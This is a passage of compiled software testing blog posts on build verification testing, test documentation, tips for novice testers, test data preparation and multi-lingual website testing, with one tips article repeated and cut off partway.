testable before it is released to the test team for further testing. These test cases are
core-functionality test cases that ensure the application is stable and can be tested
thoroughly. Typically the BVT process is automated. If the BVT fails, the build is assigned
back to the developer for a fix.

BVT is also called smoke testing or build acceptance testing (BAT).

New Build is checked mainly for two things:


• Build validation
• Build acceptance
Some BVT basics:
• It is a subset of tests that verify the main functionalities.
• BVTs are typically run on daily builds; if the BVT fails, the build is rejected and a new
build is released after the fixes are done.
• The advantage of BVT is that it saves the effort of the test team in setting up and
testing a build when major functionality is broken.
• Design BVTs carefully enough to cover basic functionality.
• Typically a BVT run should not take more than 30 minutes.
• BVT is a type of regression testing, done on each and every new build.
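The accept/reject gate described above can be sketched as a tiny runner. This is an illustrative sketch, not a real framework: tests here are callables returning True on pass, and the build ids are made up:

```python
def run_bvt(build_id, critical_tests):
    """Run the critical, stable, known-result tests against a new build.

    Accept the build only if every BVT case passes; otherwise reject it
    (with the failing case names) so it goes back to development.
    """
    failures = [name for name, test in critical_tests.items()
                if not test(build_id)]
    return ("rejected", failures) if failures else ("accepted", [])

# Two toy smoke checks standing in for real critical test cases:
tests = {
    "app_launches": lambda build: True,
    "login_works": lambda build: build != "build-042",
}
assert run_bvt("build-041", tests) == ("accepted", [])
assert run_bvt("build-042", tests) == ("rejected", ["login_works"])
```

In practice the runner would also enforce the time budget and report results to the build system, but the gating logic stays this simple.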
BVT primarily checks project integrity and whether all the modules are integrated properly.
Module integration testing is very important when different teams develop the project
modules. I have heard of many cases of application failure due to improper module
integration. In the worst cases, a complete project gets scrapped due to failure in module
integration.

What is the main task in a build release? Obviously, file 'check-in', i.e. including all the
new and modified project files associated with the respective build. BVT was primarily
introduced to check initial build health, i.e. to check whether all the new and modified files
are included in the release, whether all file formats are correct, and whether the version,
language, and flags associated with each file are correct.
These basic checks are worthwhile before releasing the build to the test team. You will save
time and money by discovering build flaws at the very beginning using BVT.
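These file-level checks lend themselves to scripting. As a rough sketch (the function and the manifest format are hypothetical, not from any real build system), a build-health check might compare the release manifest against the files actually present in the build directory:

```python
import os

def check_build_health(build_dir, manifest):
    """Compare the files listed in the release manifest against the
    files actually present in the build directory."""
    present = set()
    for root, _dirs, files in os.walk(build_dir):
        for name in files:
            rel = os.path.relpath(os.path.join(root, name), build_dir)
            present.add(rel.replace(os.sep, "/"))
    expected = set(manifest)
    return {
        "missing": sorted(expected - present),    # checked in but absent from the build
        "unexpected": sorted(present - expected), # present but not in the manifest
    }
```

A non-empty "missing" list means the build should be rejected before it ever reaches the test team.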
Which test cases should be included in BVT?
This is a very tricky decision to make before automating the BVT task. Keep in mind that
the success of BVT depends on which test cases you include.

Here are some simple tips for choosing test cases for your BVT automation suite:
• Include only critical test cases in the BVT.
• All test cases included in the BVT should be stable.
• All test cases should have a known expected result.
• Make sure the included critical functionality test cases provide sufficient application
test coverage.
Also, do not include modules that are not yet stable in the BVT. For some under-development
features you can't predict the expected behavior, as these modules are unstable and you might
already know of some failures in these incomplete modules. There is no point in using such
modules or test cases in BVT.

You can simplify this critical-functionality test case selection by communicating with
everyone involved in the project's development and testing life cycle. Such a process should
negotiate the BVT test cases, which ultimately ensures BVT success. Set some BVT quality
standards; these standards can be met only by analyzing the major project features and
scenarios.

Example: Test cases to be included in the BVT for a text editor application (some sample
tests only):
1) Test case for creating a text file.
2) Test case for typing text into the editor.
3) Test case for the copy, cut, and paste functionality of the editor.
4) Test case for opening, saving, and deleting a text file.
These are some sample test cases which can be marked as 'critical'; for every minor or
major change in the application, these basic critical test cases should be executed. This task
can be easily accomplished by BVT.
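To make this concrete, here is a minimal sketch of such a suite in Python. The `TextEditor` class below is a hypothetical stand-in for the real application; in practice the BVT would drive the actual editor through its automation interface:

```python
# A minimal, hypothetical stand-in for the text editor under test.
class TextEditor:
    def __init__(self):
        self.text = ""
        self.clipboard = ""

    def type(self, s):
        self.text += s

    def cut(self, start, end):
        self.clipboard = self.text[start:end]
        self.text = self.text[:start] + self.text[end:]

    def paste(self):
        self.text += self.clipboard

    def save(self, path):
        with open(path, "w") as f:
            f.write(self.text)

def bvt_smoke_tests(tmp_path):
    """Critical test cases: typing, cut/paste, and file round-trip."""
    ed = TextEditor()
    ed.type("hello world")
    assert ed.text == "hello world"       # typing works
    ed.cut(5, 11)
    ed.paste()
    assert ed.text == "hello world"       # cut then paste restores the text
    ed.save(tmp_path)
    with open(tmp_path) as f:
        assert f.read() == "hello world"  # save/open round-trip works
    return True
```

Each assertion maps to one of the critical test cases above; any failure means the build is not ready for the test team.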

The BVT automation suite needs to be maintained and modified from time to time, e.g. by
adding test cases to the BVT when new stable project modules become available.

What happens when the BVT suite runs?

Say the build verification automation test suite is executed after a new build:
1) The result of the BVT execution is sent to all email IDs associated with the project.
2) The BVT owner (the person executing and maintaining the BVT suite) inspects the result.
3) If the BVT fails, the BVT owner diagnoses the cause of the failure.
4) If the cause is a defect in the build, all relevant information, along with the failure logs,
is sent to the respective developers.
5) Based on an initial diagnosis, the developer replies to the team about the cause: is it
really a bug, and if so, what is the bug-fixing plan?
6) Once the bug is fixed, the BVT suite is executed again, and if the build passes, it is handed
to the test team for further detailed functionality, performance, and other tests.
This process is repeated for every new build.
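The loop above can be sketched as a small runner. The `notify` callback is a hypothetical stand-in for step 1 (mailing the result to the project's email IDs); the test suite is just a mapping from test names to callables:

```python
def run_bvt(test_suite, notify):
    """Run each BVT test case, then notify the team with the result.
    `test_suite` maps test names to zero-argument callables; `notify`
    is a stand-in for sending the result email to the project list."""
    failures = {}
    for name, test in test_suite.items():
        try:
            test()
        except Exception as exc:       # capture the failure log for developers
            failures[name] = str(exc)
    status = "PASS" if not failures else "FAIL"
    notify(status, failures)
    return status, failures
```

On a FAIL result, the `failures` dictionary is what the BVT owner would forward to the respective developers as the failure log.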

Why does a BVT or build fail?

The BVT breaks sometimes. This doesn't mean there is always a bug in the build. There are
other reasons for a build to fail, such as test case coding errors, automation suite errors,
infrastructure errors, hardware failures, etc.
You need to troubleshoot the cause of the BVT break and take proper action after diagnosis.
Tips for BVT success:
1) Spend considerable time writing the BVT test case scripts.
2) Log as much detailed information as possible to diagnose a BVT pass or fail result. This
will help the developer team debug and quickly find the failure cause.
3) Select stable test cases for the BVT. For new features, if a new critical test case passes
consistently on different configurations, promote it into your BVT suite. This reduces the
probability of frequent build failures due to new, unstable modules and test cases.
4) Automate the BVT process as much as possible: right from the build release process to
the BVT result, automate everything.
5) Have some penalties for breaking the build. Some chocolates or a team coffee party from
the developer who breaks the build will do.
Conclusion:
BVT is nothing but a set of regression test cases executed for each new build. It is also
called a smoke test. A build is not assigned to the test team unless and until the BVT passes.
The BVT can be run by a developer or a tester; the result is communicated throughout the
team, and immediate action is taken to fix the bug if the BVT fails. The BVT process is
typically automated by writing scripts for the test cases. Only critical test cases are
included, and these should ensure application test coverage. BVT is very effective for daily
as well as long-term builds. It saves significant time, cost, and resources, and, after all,
spares the test team the frustration of an incomplete build.

10 Tips to Help You Achieve Your Software Testing Documentation Goal
April 18th, 2010 — Basics of Software testing, Manual Testing, Quality assurance, Testing best practices
Note: If you missed the first part of this post, please read it: Why Documentation is
Important in Testing?
As I mentioned in my earlier post, the general perception of software testing documentation
is that "it can only be done by a person who has free time". We need to change this mindset;
only then can we leverage the power of documentation on our projects.

It's not that we don't know how to do documentation right. We just don't think it's
important.

Everyone has standard templates for every kind of documentation, from test strategy, test
plan, test cases, and test data to bug reports. These exist to follow certain standards
(CMMI, ISO, etc.), but when it comes to actual implementation, how many of these documents
do we really use? We need to synchronize our quality process with the documentation
standards and other processes in the organization.

Why Documentation is Important in Software Testing
March 7th, 2010 — Manual Testing, Testing best practices

This is a guest article by 'Tejaswini Patil' – Associate QA Manager.


In my software testing career, I have never heard people talk much about software testing
documentation. The general opinion about testing documentation is that anyone who has
free time can do documentation such as test cases, test plans, status reports, bug reports,
project proposals, etc.

Even I did not stress documentation much, but I can say it is my habit to put all the data
down in black and white and to keep others updated on it as well.

Just want to share my experience with you:


We had delivered a project (with an unknown issue in it) to one of our clients (an angry
client). They found the issue on the client's side, which was a very bad situation for us,
and, as usual, all the blame was on the QAs.
Software Testing Advice for Novice Testers
December 11th, 2008 — Career in software Testing, How to be a good tester, Testing Tips and
resources, Testing best practices

Novice testers have many questions about software testing and the actual work they are
going to perform. As a novice tester, you should be aware of certain facts of the software
testing profession. The tips below will certainly help you advance in your software-testing
career. These 'testing truths' are applicable to and helpful for experienced testing
professionals as well. Apply each and every testing truth mentioned below in your career
and you will never regret what you do.
Know Your Application
Don’t start testing without understanding the requirements. If you test without knowledge
of the requirements, you will not be able to determine if a program is functioning as
designed and you will not be able to tell if required functionality is missing. Clear
knowledge of requirements, before starting testing, is a must for any tester.
Know Your Domain
As I have said many times, you should acquire thorough knowledge of the domain in which
you are working. Knowing the domain will help you suggest good bug solutions. Your test
manager will appreciate your suggestions if you have valid points to make. Don't stop at
just logging the bug; provide solutions as well. Good domain knowledge will also help you
design better test cases with maximum test coverage. For more guidance on acquiring
domain knowledge, read this post.
No Assumptions In Testing
Don’t start testing with the assumption that there will be no errors. As a tester, you should
always be looking for errors.
Learn New Technologies
No doubt, old testing techniques still play a vital role in day-to-day testing, but try to
introduce new testing procedures that work for you. Don’t rely on book knowledge. Be
practical. Your new testing ideas may work amazingly for you.
You Can’t Guarantee a Bug Free Application
No matter how much testing you perform, you can't guarantee a 100% bug-free application.
There are constraints that may force your team to advance a product to the next level while
knowing that some common or low-priority issues remain. Try to uncover as many bugs as
you can, but prioritize your efforts on the basic and crucial functions. Put your best effort
into doing good work.
Think Like An End User
This is my top piece of advice. Don't think only like a technical person; think like your
customers or end users, and always think beyond your end users too. Test your application
as an end user would, and think about how an end user will use your application. Technical
thinking plus end-user thinking will ensure that your application is user friendly and
passes acceptance tests easily. This was the first piece of advice my test manager gave me
when I was a novice tester.
100% Test Coverage Is Not Possible
Don’t obsess about 100% test coverage. There are millions of inputs and test combinations
that are simply impossible to cover. Use techniques like boundary value analysis and
equivalence partitioning testing to limit your test cases to manageable sizes.
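As an illustration, boundary value analysis and equivalence partitioning for a numeric input field can be expressed in a few lines (the 1–100 range is an arbitrary example):

```python
def boundary_values(lo, hi):
    """Boundary value analysis for an integer field accepting lo..hi:
    test just below, on, and just above each boundary."""
    return [lo - 1, lo, lo + 1, hi - 1, hi, hi + 1]

def equivalence_classes(lo, hi):
    """Equivalence partitioning: one representative value per class
    (below range, in range, above range)."""
    return {
        "invalid_low": lo - 10,
        "valid": (lo + hi) // 2,
        "invalid_high": hi + 10,
    }
```

For a field accepting 1–100 this yields nine test inputs in place of a hundred-plus exhaustive cases, which is the whole point of the two techniques.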
Build Good Relations With Developers
As a tester, you communicate with many other team members, especially developers. There
are many situations where tester and developer may not agree on certain points. It will
take your skill to handle such situations without harming a good relationship with the
developer. If you are wrong, admit it. If you are right, be diplomatic. Don’t take it
personally. After all, it is a profession, and you both want a good product.
Learn From Mistakes
As a novice, you will make mistakes. If you don't make mistakes, you are not testing hard
enough! You will learn things as you gain experience. Use your mistakes as learning
experiences, and try not to repeat them. It hurts when the client files a bug in an
application you tested. It is definitely an embarrassing situation, and it cannot always be
avoided. However, don't beat yourself up. Find the root cause of the failure, try to find out
why you didn't catch that bug, and avoid the same mistake in the future. If required, change
some of the testing procedures you are following.
Don’t Underestimate Yourself if Some of Your bugs Are Not Fixed
Some testers assume that every bug they log should get fixed. That is a fair expectation up
to a point, but you must be flexible according to the situation. Not all bugs get fixed.
Management can defer bugs to be fixed later, since some bugs have low priority or low
severity, or there is no time to fix them. Over time you will also learn which bugs can be
deferred until the next release. Read the article on 'How to get all your bugs resolved'.
Over To You:
If you are an experienced tester, what advice would you like to give to novice testers?
Top 20 practical software testing tips you should
read before testing any application.
September 29th, 2008 — Testing Skill Improvement, Testing Tips and resources, Testing best practices

I wish all testers would read these good software testing practices. Read all the points
carefully and try to implement them in your day-to-day testing activities. That is what I
expect from this article. If you don't understand any testing practice, ask for clarification
in the comments below. You will eventually learn all these practices through experience,
but why not learn them before making the mistakes?
Here are some of the best testing practices I learned by experience:
1) Learn to analyze your test results thoroughly. Do not ignore the test result. The
final test result may be 'pass' or 'fail', but troubleshooting the root cause of a 'fail' will
lead you to the solution of the problem. Testers will be respected if they not only log the
bugs but also provide solutions.
2) Learn to maximize the test coverage every time you test any application. Though
100 percent test coverage might not be possible, you can always try to get near it.
3) To ensure maximum test coverage break your application under test (AUT) into
smaller functional modules. Write test cases on such individual unit modules. Also if
possible break these modules into smaller parts.
E.g.: Let's assume you have divided your website application into modules, and 'accepting
user information' is one of those modules. You can break this 'User information' screen into
smaller parts for writing test cases: parts like UI testing, security testing, and functional
testing of the 'User information' form. Apply all form field type and size tests, and negative
and validation tests, on the input fields, and write all such test cases for maximum coverage.
4) While writing test cases, write test cases for the intended functionality first, i.e. for
valid conditions according to the requirements. Then write test cases for invalid conditions.
This will cover expected as well as unexpected behavior of the application under test.
5) Think positive. Start testing the application with the intent of finding bugs/errors.
Don't assume beforehand that there will not be any bugs in the application. If you test the
application with the intention of finding bugs, you will definitely succeed in finding those
subtle bugs as well.
6) Write your test cases in requirement analysis and design phase itself. This way you can
ensure all the requirements are testable.
7) Make your test cases available to developers prior to coding. Don't keep your test
cases to yourself, waiting for the final application release for testing in the hope of logging
more bugs. Let developers analyze your test cases thoroughly to develop a quality
application. This will also save rework time.
8) If possible, identify and group your test cases for regression testing. This will
ensure quick and effective manual regression testing.
9) Applications requiring critical response times should be thoroughly tested for
performance. Performance testing is a critical part of many applications, but in manual
testing it is mostly ignored by testers due to the lack of the large data volumes that
performance testing requires. Find ways to test your application for performance. If it is
not possible to create test data manually, write some basic scripts to create test data for
the performance test, or ask the developers to write one for you.
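Such a basic data-generation script can be very simple. The sketch below (the field names and row count are illustrative, not from any real schema) writes synthetic user records to a CSV file for a performance run:

```python
import csv
import random
import string

def generate_user_rows(path, count, seed=42):
    """Generate `count` synthetic user records for performance testing.
    Seeded so the same data set can be reproduced on every run."""
    rng = random.Random(seed)
    with open(path, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["id", "name", "age"])  # illustrative columns
        for i in range(count):
            name = "".join(rng.choices(string.ascii_lowercase, k=8))
            writer.writerow([i, name, rng.randint(18, 90)])
```

Scaling `count` into the millions gives the volume a performance test needs without manual data entry.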
10) Programmers should not test their own code. As discussed in our previous post,
basic unit testing of the developed application should be enough for developers before
releasing the application to testers. But you (testers) should not force developers to release
the product for testing. Let them take their time. Everyone from lead to manager knows when
the module/update is released for testing, and they can estimate the testing time accordingly.
This is a typical situation in an agile project environment.
11) Go beyond requirement testing. Test application for what it is not supposed to do.
12) While doing regression testing, use the previous bug graph (bug graph – the number
of bugs found against time, for different modules). This module-wise bug graph can be useful
for predicting the most bug-prone parts of the application.
13) Note down the new terms and concepts you learn while testing. Keep a text file open
while testing an application and note down the testing progress and your observations in it.
Use these notes while preparing the final test release report. This good habit will help you
provide a complete, unambiguous test report and release details.
14) Many times testers or developers make changes to the code base of the application under
test. This is a required step in the development or testing environment to avoid executing
live transaction processing, as in banking projects. Note down all such code changes made
for testing purposes, and at the time of the final release make sure you have removed all of
them from the final client-side deployment files.
15) Keep developers away from the test environment. This is a required step for
detecting any configuration changes missing from the release or deployment document.
Sometimes developers make system or application configuration changes but forget to
mention them in the deployment steps. If developers don't have access to the testing
environment, they will not accidentally make any such changes on it, and the missing steps
can be caught in the right place.
16) It's a good practice to involve testers right from the software requirement and
design phases. This way testers can gain knowledge of the application's dependencies,
resulting in detailed test coverage. If you are not asked to be part of this development
cycle, request your lead or manager to involve your testing team in all decision-making
processes and meetings.
17) Testing teams should share best testing practices and experience with other teams in
their organization.
18) Increase your conversations with developers to learn more about the product.
Whenever possible, communicate face-to-face to resolve disputes quickly and to avoid
misunderstandings. But once you understand the requirement or resolve a dispute, make
sure to confirm it through written communication such as email. Do not keep anything
verbal.
19) Don't run out of time for high-priority testing tasks. Prioritize your testing work
from high to low priority and plan your work accordingly. Analyze all associated risks to
prioritize your work.
20) Write clear, descriptive, unambiguous bug reports. Do not only provide the bug
symptoms; also provide the effect of the bug and all possible solutions.
Don't forget: testing is a creative and challenging task. In the end, how you handle this
challenge depends on your skill and experience.

Over to you:
Sharing your own testing experience, tips, or testing secrets in the comments below will
definitely make this article more interesting and helpful!


Developers are not good testers. What do you say?


August 7th, 2008 — Tester vs Developer, Testing best practices
This could be a big debate. When developers test their own code, what is the testing
output? All happy endings! Yes, the person who develops the code generally sees only
the happy paths of the product and doesn't want to go into much detail.
The main concern with developer testing is misunderstanding of requirements. If the
developer misunderstands the requirements, then no matter how deeply he tests the
application, he will never find the error. The place where the bug is first introduced will
remain till the end, because the developer will see it as functionality.
Optimistic developers: "Yes, I wrote the code and I am confident it's working properly.
No need to test this path, no need to test that path; I know it's working properly." And
right there developers skip the bugs.
Developer vs. tester: a developer always wants to see his code working properly, so he will
test it to check that it works correctly. But do you know why a tester tests the application?
To make it fail in any way possible; the tester will surely test how the application does
not work correctly. This is the main difference between developer testing and tester testing.
Should developers test their own work?
I personally don't mind developers testing their own code. After all, it's their baby.
They know their code very well. They know the traps in their code: where it can fail, where
to concentrate more, and which paths of the application are important. Developers can do
unit testing very well and can effectively identify boundary cases.
All of this applies to a developer who is also a good tester! But most developers consider
testing a painful job; even though they know the system well, through negligence they tend
to skip many testing paths, as it is a very painful experience for them. If developers find
errors in their code during unit testing, the errors are comparatively easier to fix, as the
code is still fresh in their minds, rather than getting the bug back from testers two or
three days later. But this is only possible if the developer is interested in doing that
much testing.
It is the tester's responsibility to make sure each and every path is tested. Testers
should ideally give importance to every small detail to verify that the application is not
breaking anywhere.
Developers, please don't review your own code. You will generally overlook the issues in
your own code, so give it to others for review.
Everyone has a specialization in a particular area. Developers generally think about how to
build the application; testers, on the other hand, think about how the end user is going to
use it.

Conclusion
So, in short, there is no problem with developers doing basic unit testing and basic
verification testing. Developers can test the few exceptional conditions they know are
critical and should not be missed. But there are some great testers out there; throw the
build over to the test team and don't waste your own time either. For the success of any
project there should be an independent testing team validating your applications. After
all, it's our (testers') responsibility to make the 'baby' smarter!!
What do you say?

Tips to design test data before executing your test cases
I have mentioned the importance of proper test data in many of my previous articles. A
tester should check and update the test data before executing any test case. In this article
I will provide tips on how to prepare the test environment so that no important test
case is missed due to improper test data or an incomplete test environment setup.

What do I mean by test data?


If you are writing a test case, you need input data for the test. The tester may provide
this input data at the time of executing the test cases, or the application may pick the
required input data from predefined data locations. The test data may be any kind of input
to the application: any kind of file loaded by the application, or entries read from database
tables. It may be in any format, like XML test data, system test data, SQL test data, or
stress test data.

Preparing proper test data is part of the test setup. Generally testers call it testbed
preparation. In the testbed, all software and hardware requirements are set up using the
predefined data values.
If you don't have a systematic approach for building test data while writing and executing
test cases, there is a chance of missing some important test cases. A tester can't justify
a missed bug by saying that test data was not available or was incomplete. It is every
tester's responsibility to create his/her own test data according to the testing needs. Don't
rely on test data created by another tester, or on standard production test data, which
might not have been updated for months! Always create a fresh set of your own test data
according to your test needs.
Sometimes it is not possible to create a completely new set of test data for each and every
build. In such cases you can use standard production data, but remember to add/insert your
own data sets into the available database. One good way to design test data is to use the
existing sample test data or testbed and append your new test case data each time you get
the same module for testing. This way you can build a comprehensive data set.

How to keep your data intact for any test environment?


Many times more than one tester is responsible for testing a build. In this case more than
one tester will have access to the common test data, and each tester will try to manipulate
that common data according to his/her own needs. The best way to keep your valuable input
data collection intact is to keep personal copies of the same data. The data may be in any
format: inputs to be provided to the application, or input files such as Word files, Excel
files, or photo files.

Check that your data is not corrupted:

Filing a bug without proper troubleshooting is a bad practice. Before executing any test
case on existing data, make sure that the data is not corrupted and that the application can
read the data source.

How to prepare data considering performance test cases?


Performance tests require a very large data set. In particular, if the application fetches or
updates data from DB tables, large data volumes play an important role when testing such an
application for performance. Sometimes manually created data will not catch some subtle
bugs that can only be caught with real data created by the application under test. If you
want real-time data, which is impossible to create manually, ask your manager to make it
available from the live environment.

I generally ask my manager whether he can make live environment data available for testing.
This data is useful for ensuring smooth functioning of the application for all valid inputs.

Take the example of the 'statistics testing' in my search engine project. To check the
history of user searches and clicks on advertiser campaigns, data covering several years
had to be processed, which was practically impossible to create manually for so many dates
spread over many years. So there was no option other than using a live server data backup
for testing. (But first make sure your client allows you to use this data.)
What is the ideal test data?
Test data can be said to be ideal if, with the minimum size of data set, all the application
errors get identified. Try to prepare test data that exercises all application functionality
without exceeding the cost and time constraints of preparing the test data and running the
tests.

How to prepare test data that will ensure complete test coverage?
Design your test data considering the following categories:
Test data set examples:
1) No data: Run your test cases on blank or default data. See if proper error messages are
generated.
2) Valid data set: Create it to check whether the application functions as per requirements
and valid input data is properly saved in the database or files.
3) Invalid data set: Prepare an invalid data set to check application behavior for negative
values and alphanumeric string inputs.
4) Illegal data format: Make one data set in an illegal data format. The system should not
accept data in an invalid or illegal format. Also check that proper error messages are
generated.
5) Boundary condition data set: A data set containing out-of-range data. Identify the
application's boundary cases and prepare a data set covering both the lower and upper
boundary conditions.
6) Data set for performance, load, and stress testing: This data set should be large in
volume.
Creating separate data sets for each test condition in this way will ensure complete test
coverage.
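To illustrate, the six categories can be collected into named data sets for a hypothetical numeric 'age' field that accepts values from 18 to 60 (the field and its range are invented for the example):

```python
def build_test_data_sets(lo=18, hi=60):
    """Categorized test data for a hypothetical numeric 'age' field
    that accepts values from lo to hi."""
    return {
        "no_data": ["", None],                   # 1) blank/default input
        "valid": [lo, (lo + hi) // 2, hi],       # 2) values per requirements
        "invalid": [-1, "abc", "12ab"],          # 3) negative / alphanumeric
        "illegal_format": ["18.0.0", "1,8"],     # 4) wrong format entirely
        "boundary": [lo - 1, lo, hi, hi + 1],    # 5) edges just outside/inside range
        "load": list(range(100000)),             # 6) large volume for load tests
    }
```

Running every test case against each named set, in turn, is what turns the category list above into actual coverage.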

Conclusion:
Preparing proper test data is a core part of the "project test environment setup". A tester
cannot pass off responsibility for a bug by saying that complete data was not available for
testing. Testers should create their own test data in addition to the existing standard
production data. Your test data set should be ideal in terms of cost and time. Use the tips
provided in this article to categorize test data and ensure complete coverage of functional
test cases.

Be creative; use your own skill and judgment to create different data sets instead of relying
on standard production data while testing.

What is your experience?


Have you faced the problem of incomplete data for testing? How did you manage to create
your own data? Share your simple tips and tricks for creating or using test data.

7 Basic Tips for Testing Multi-Lingual Web Sites

This is a guest article by: Inder P Singh
These days a number of web sites are deployed in multiple languages. As companies do more
and more business in other countries, the number of such global, multi-lingual web
applications will continue to increase.

Testing web sites that support multiple languages has its own fair share of challenges. In
this article, I will share seven tips that will enable you to test multi-lingual
browser-based applications thoroughly:
Tip # 1 – Prepare and use the required test environment
If a web site is hosted in English and Japanese languages, it is not enough to simply change
the default browser language and perform identical tests in both the languages. Depending
on its implementation, a web site may figure out the correct language for its interface from
the browser language setting, the regional and language settings of the machine, a
configuration in the web application or other factors. Therefore, in order to perform a
realistic test, it is imperative that the web site be tested from two machines – one with the
English operating system and one with the Japanese operating system. You might want to
keep the default settings on each machine since many users do not change the default
settings on their machines.

Tip # 2 – Acquire correct translations


A native speaker of the language, belonging to the same region as the users, is usually
the best resource to provide translations that are accurate in both meaning as well as
context. If such a person is not available to provide you the translations of the text, you
might have to depend on automated web translations available on web sites like
wordreference.com and dictionary.com. It is a good idea to compare automated translations
from multiple sources before using them in the test.
Tip # 3 – Get really comfortable with the application
Since you might not know the languages supported by the web site, it is always a good idea
for you to be very conversant with the functionality of the web site. Execute the test cases
in the English version of the site a number of times. This will help you find your way easily
within the other language version. Otherwise, you might have to keep the English version of
the site open in another browser in order to figure out how to proceed in the other language
version (and this could slow you down).

Tip # 4 – Start with testing the labels


You could start testing the other language version of the web site by first looking at all the
labels. Labels are the more static items in the web site. English labels are usually short and
translated labels tend to expand. It is important to spot any issues related to label
truncation, overlay on/ under other controls, incorrect word wrapping etc. It is even more
important to compare the labels with their translations in the other language.
Tip # 5 – Move on to the other controls
Next, you could move on to checking the other controls for correct translations and for any
user interface issues. It is important that the web site provide correct error messages in
the other language, so the test should include generating all the error messages. For any
text that is not translated, three possibilities usually exist: the text will be missing, its
English equivalent will be present, or you will see junk characters in its place.
Tip # 6 – Do test the data
Usually, multi-lingual web sites store their data in the UTF-8 Unicode encoding format, in which data in different languages can be easily represented. To check the character encoding for your web site in Mozilla Firefox, go to View -> Character Encoding; in Internet Explorer, go to View -> Encoding. Make sure to check the input data: it should be possible to enter data in the other language in the web site. The data displayed by the web site should be correct, and the output data should be compared with its translation.
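As a quick sanity check of the UTF-8 handling described above, a small script can verify that sample text in several scripts survives the encode/decode round trip that a site's storage layer performs. This is a minimal sketch; the sample strings are arbitrary stand-ins for real translated test data.

```python
# Minimal sketch of a UTF-8 round-trip check for multi-lingual input data.
# The sample strings are arbitrary; a real test would use the site's
# actual translated test data.

def roundtrip_utf8(text: str) -> bool:
    """Encode to UTF-8 (as stored) and decode back (as displayed)."""
    stored = text.encode("utf-8")
    retrieved = stored.decode("utf-8")
    return retrieved == text

# Sample inputs in several scripts that the site should accept verbatim.
samples = ["Grüße", "こんにちは", "مرحبا", "Привет"]
assert all(roundtrip_utf8(s) for s in samples)
```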

Tip # 7 – Be aware of cultural issues


A challenge in testing multi-lingual web sites is that each language might be meant for
users from a particular culture. Many things such as preferred (and not preferred) colors,
text direction (this can be left to right, right to left or top to bottom), format of
salutations and addresses, measures, currency etc. are different in different cultures.
Not only should the other language version of the web site provide correct translations,
other elements of the user interface e.g. text direction, currency symbol, date format etc.
should also be correct.
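To make the date-format point concrete, the snippet below renders one calendar date under a few common regional conventions. The format strings are illustrative conventions, not authoritative locale data; a real localization test would check against the project's locale specifications.

```python
from datetime import date

# The same calendar date rendered under different regional conventions.
# A localized site must use the convention matching each language version;
# the formats below are common conventions, shown only for illustration.
d = date(2023, 3, 4)
formats = {
    "en_US": d.strftime("%m/%d/%Y"),   # month first
    "en_GB": d.strftime("%d/%m/%Y"),   # day first
    "de_DE": d.strftime("%d.%m.%Y"),   # day first, dot-separated
    "ja_JP": d.strftime("%Y/%m/%d"),   # year first
}
```

A reader of the en_GB version would interpret the en_US string "03/04/2023" as 3 April, which is exactly the kind of cultural mismatch this tip warns about.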
As you might have gathered from the tips given above, using the correct test
environment and acquiring correct translations is critical in performing a successful
test of other language versions of a web site.

Top 20 practical software testing tips you should read before testing any application
I wish all testers would read these software testing good practices. Read all the points carefully and try to implement them in your day-to-day testing activities; that is what I expect from this article. If you don't understand any testing practice, ask for clarification in the comments below. You will eventually learn all these practices by experience, but why not learn them before making any mistakes?
Here are some of the best testing practices I learned by experience:
1) Learn to analyze your test results thoroughly. Do not ignore the test result. The final test result may be 'pass' or 'fail', but troubleshooting the root cause of a 'fail' will lead you to the solution of the problem. Testers will be respected if they not only log the bugs but also provide solutions.
2) Learn to maximize the test coverage every time you test any application. Though 100 percent test coverage might not be possible, you can always try to come close to it.
3) To ensure maximum test coverage break your application under test (AUT) into
smaller functional modules. Write test cases on such individual unit modules. Also if
possible break these modules into smaller parts.
E.g. let's assume you have divided your web site application into modules and 'accepting user information' is one of the modules. You can break this 'User information' screen into smaller parts for writing test cases: UI testing, security testing, functional testing of the 'User information' form, etc. Apply all form field type and size tests, and negative and validation tests on input fields, and write test cases for all of them for maximum coverage.
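The field-level tests described above can be written in a data-driven style: one validator, one list of valid cases, one list of invalid cases. The validator below is a hypothetical example for an e-mail field of the 'User information' form, including a size limit; the 50-character cap and the regex are assumptions for illustration.

```python
import re

# A hypothetical validator for one field of the 'User information' form,
# exercised by small data-driven valid/invalid test cases.

def validate_email(value: str) -> bool:
    """Accept a plausibly formed e-mail address of at most 50 characters."""
    if not value or len(value) > 50:
        return False
    return re.fullmatch(r"[^@\s]+@[^@\s]+\.[A-Za-z]{2,}", value) is not None

valid_cases = ["user@example.com", "a.b@test.co"]
invalid_cases = ["", "no-at-sign", "two@@example.com", "x@y",
                 "a" * 60 + "@example.com"]   # empty, malformed, oversized

assert all(validate_email(v) for v in valid_cases)
assert not any(validate_email(v) for v in invalid_cases)
```

Adding a new negative test is then just one more entry in `invalid_cases`, which keeps coverage growing cheaply.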
4) While writing test cases, write test cases for intended functionality first, i.e. for valid conditions according to requirements. Then write test cases for invalid conditions. This will cover expected as well as unexpected behavior of the application under test.
5) Think positive. Start testing the application with the intent of finding bugs/errors. Don't assume beforehand that there will not be any bugs in the application. If you test the application with the intention of finding bugs, you will definitely succeed in finding even the subtle ones.
6) Write your test cases in requirement analysis and design phase itself. This way you can
ensure all the requirements are testable.
7) Make your test cases available to developers prior to coding. Don't keep your test cases to yourself, waiting for the final application release for testing in the hope of logging more bugs. Let developers analyze your test cases thoroughly to develop a quality application. This will also save re-work time.
8) If possible, identify and group your test cases for regression testing. This will ensure quick and effective manual regression testing.
9) Applications requiring critical response time should be thoroughly tested for performance. Performance testing is a critical part of many applications. In manual testing this part is mostly ignored by testers due to the lack of the large data volume required for performance testing. Find out ways to test your application for performance. If it is not possible to create test data manually, write some basic scripts to create test data for the performance test, or ask developers to write one for you.
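A basic test-data generation script of the kind suggested above might look like the following. It writes synthetic user rows to a CSV file for a performance run; the field names, file name, and row count are illustrative, not taken from any real schema.

```python
import csv
import random
import string

# Generate synthetic user rows for a performance test.
# All field names and the output file name are illustrative assumptions.

def random_name(length: int = 8) -> str:
    """Build a random lowercase name, capitalized."""
    return "".join(random.choices(string.ascii_lowercase, k=length)).title()

def generate_users(path: str, count: int) -> None:
    """Write `count` synthetic user rows (plus a header) to a CSV file."""
    with open(path, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["id", "name", "email", "age"])
        for i in range(count):
            name = random_name()
            writer.writerow([i, name, f"{name.lower()}@example.com",
                             random.randint(18, 90)])

generate_users("perf_users.csv", 10_000)
```

Scaling the `count` argument up lets you probe how the application behaves as data volume grows.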
